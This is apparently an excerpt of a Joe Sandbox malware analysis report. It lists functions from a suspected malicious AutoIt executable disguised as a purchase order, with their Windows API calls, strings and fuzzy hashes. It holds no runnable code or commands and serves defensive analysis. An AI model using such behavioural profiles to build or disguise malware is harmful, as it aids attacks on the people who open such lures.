                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Internet$OpenOption
                      • String ID: <local>
                      • API String ID: 942729171-4266983199
                      • Opcode ID: 461396099bbee1d1185f14ad2d24f492ee1885f876470444856b156f4f540ced
                      • Instruction ID: 4736e5b2ab9d52da0334c6dd159a47330d7fd521907f253b45a659574efea5cd
                      • Opcode Fuzzy Hash: 461396099bbee1d1185f14ad2d24f492ee1885f876470444856b156f4f540ced
                      • Instruction Fuzzy Hash: 2C11A370941A61BADB158F629C84EFBFBAAFF1275AF10812AF54597080E7705980C6F0
                      Function 00AEACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                      Download Yara Rule
                      APIs
                      • inet_addr.WSOCK32(00000000), ref: 00AEACF5
                      • htons.WSOCK32(00000000), ref: 00AEAD32
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: htonsinet_addr
                      • String ID: 255.255.255.255
                      • API String ID: 3832099526-2422070025
                      • Opcode ID: fc229b4ae6eff17320f937ba45dd9491a48d40d16ae170206f584e7afe4bee96
                      • Instruction ID: a05f2b4aa9741fe0389f8da0aa6ba43f4bcff17663e50ff0867469c9e4852372
                      • Opcode Fuzzy Hash: fc229b4ae6eff17320f937ba45dd9491a48d40d16ae170206f584e7afe4bee96
                      • Instruction Fuzzy Hash: 6101D235200245ABCB10AFA9CC86FADB3B4EF14720F10852AF5169B2D1DA71F804C766
                      Function 00ACC577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00ACC5E5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 1456604079-1403004172
                      • Opcode ID: 5dc908a61a888ac91306db617391a99ccaf2240d30686c11d9517b2c742e5a20
                      • Instruction ID: 7753fa901284930978b3604af7e0be581d45d68fc80fc0e2de3837aba47ebcec
                      • Opcode Fuzzy Hash: 5dc908a61a888ac91306db617391a99ccaf2240d30686c11d9517b2c742e5a20
                      • Instruction Fuzzy Hash: CE01F771A41518ABCB08EBA8CD52EFE73EAAF42360B540A1DF433E72D1DF3069089750
                      Function 00ADC4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __fread_nolock_memmove
                      • String ID: EA06
                      • API String ID: 1988441806-3962188686
                      • Opcode ID: 332a796a55ae182d16f658cf36006627fa51b54c3a017a957b93f3fb4b43d6bf
                      • Instruction ID: 40017b521f75867c5a020953757f4d45c80378e898f417b4ab6b5904e4843a1d
                      • Opcode Fuzzy Hash: 332a796a55ae182d16f658cf36006627fa51b54c3a017a957b93f3fb4b43d6bf
                      • Instruction Fuzzy Hash: 9901B572944258BEDB28D7A8C856EFE7BF89B15711F00419BE193D62C2E5B4A708CB60
                      Function 00ACC473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00ACC4E1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 1456604079-1403004172
                      • Opcode ID: 618cd59c1418793af8511b8e11c78f6a8ce8e75ba6094e28781a0b7e39c18ec5
                      • Instruction ID: 4c0ee760eea42f6de5bcac7b4ce6067a1b3c1c5b413bb0c7b587ff9dede7691a
                      • Opcode Fuzzy Hash: 618cd59c1418793af8511b8e11c78f6a8ce8e75ba6094e28781a0b7e39c18ec5
                      • Instruction Fuzzy Hash: B101DF71A415086BCB08EBA0CA62FFF73E99B01350F154019F902E72D1DA105E08A7A1
                      Function 00ACC4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00ACC562
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 1456604079-1403004172
                      • Opcode ID: 41d985449fcd838f706c7e977f564969546d95468f499aca7e963af459e5c395
                      • Instruction ID: 4652ea0dc440e1ff48ad57bd58c9702b1447d62e9b217369f77915d839e7018c
                      • Opcode Fuzzy Hash: 41d985449fcd838f706c7e977f564969546d95468f499aca7e963af459e5c395
                      • Instruction Fuzzy Hash: 7E01AD71B81508ABCB05EBA4CA52FFF73E99B01751F550019F807E3291EA54AF09A7A1
                      Function 00AD804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ClassName_wcscmp
                      • String ID: #32770
                      • API String ID: 2292705959-463685578
                      • Opcode ID: 3b431c5598e34b8675e41cb03908f41f899efdaba7eb157cdf533fcda9841d71
                      • Instruction ID: a5c73b4b81860c4b59836b360737dd91de30857373349b2f4b4d947d35c79f47
                      • Opcode Fuzzy Hash: 3b431c5598e34b8675e41cb03908f41f899efdaba7eb157cdf533fcda9841d71
                      • Instruction Fuzzy Hash: 0AE0923360022927D720EAA59C0AFD7FBACEB55BA4F000066A914D3141EA709A4587D4
                      Function 00ACB35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                      Download Yara Rule
                      APIs
                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00ACB36B
                        • Part of subcall function 00AB2011: _doexit.LIBCMT ref: 00AB201B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Message_doexit
                      • String ID: AutoIt$Error allocating memory.
                      • API String ID: 1993061046-4017498283
                      • Opcode ID: 2e4d76456fd9aa01637db47fa844edc27d5c0c4848f7b1101831b39ca7ed9ebc
                      • Instruction ID: 7b3e191025b33bc7e2f84f335ab501003158cf32c0dccbb445984a34ad101654
                      • Opcode Fuzzy Hash: 2e4d76456fd9aa01637db47fa844edc27d5c0c4848f7b1101831b39ca7ed9ebc
                      • Instruction Fuzzy Hash: 4BD0123138435832D21972987D0BFC96ACC4F05B51F514066BF4C965D38AD6958062A9
                      Function 00B0BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                      Download Yara Rule
                      APIs
                      • GetSystemDirectoryW.KERNEL32(?), ref: 00B0BAB8
                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B0BCAB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: DirectoryFreeLibrarySystem
                      • String ID: WIN_XPe
                      • API String ID: 510247158-3257408948
                      • Opcode ID: 734ad69c082c1bf80ff750c5bb9b347dd4c60b6fa7df33429e0b7caebf32b221
                      • Instruction ID: 93d7ff69217b7793486a7d7e7636f57d12c56e85d229b9c04be22ce0ac64e8a5
                      • Opcode Fuzzy Hash: 734ad69c082c1bf80ff750c5bb9b347dd4c60b6fa7df33429e0b7caebf32b221
                      • Instruction Fuzzy Hash: 83E0A570D04109AFCB15DBA9C985EECBBB8BB08341F54849AE022B30A1CB715A459F25
                      Function 00AF8495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                      Download Yara Rule
                      APIs
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AF849F
                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AF84B2
                        • Part of subcall function 00AD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD83CD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: FindMessagePostSleepWindow
                      • String ID: Shell_TrayWnd
                      • API String ID: 529655941-2988720461
                      • Opcode ID: 8605920abbd1ec35d2a80a8ce435d0caef9f040d3f65e52d9a9abe3e543da374
                      • Instruction ID: 65404003231d7d6fa6ea01e4b06b1a7fc1cbff219f883262784a9ff0f336bcee
                      • Opcode Fuzzy Hash: 8605920abbd1ec35d2a80a8ce435d0caef9f040d3f65e52d9a9abe3e543da374
                      • Instruction Fuzzy Hash: DCD0A932388320B7E620A330AC0FFC66A84AB14B00F040869720AAA2D0CCA0A8008220
                      Function 00AF84C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                      Download Yara Rule
                      APIs
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AF84DF
                      • PostMessageW.USER32(00000000), ref: 00AF84E6
                        • Part of subcall function 00AD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD83CD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: FindMessagePostSleepWindow
                      • String ID: Shell_TrayWnd
                      • API String ID: 529655941-2988720461
                      • Opcode ID: 57c16819cf0cdfca349add5459317f49b20159c928ff491425ee281a5b1c2d63
                      • Instruction ID: 1a4526b64b191301d2bd01de53d57d1012a38601896e2bbb8c31476950a27f80
                      • Opcode Fuzzy Hash: 57c16819cf0cdfca349add5459317f49b20159c928ff491425ee281a5b1c2d63
                      • Instruction Fuzzy Hash: F1D022323843207BE721A330AC0FFC77684AB18F00F040869730AAB2D0CCF0B800C220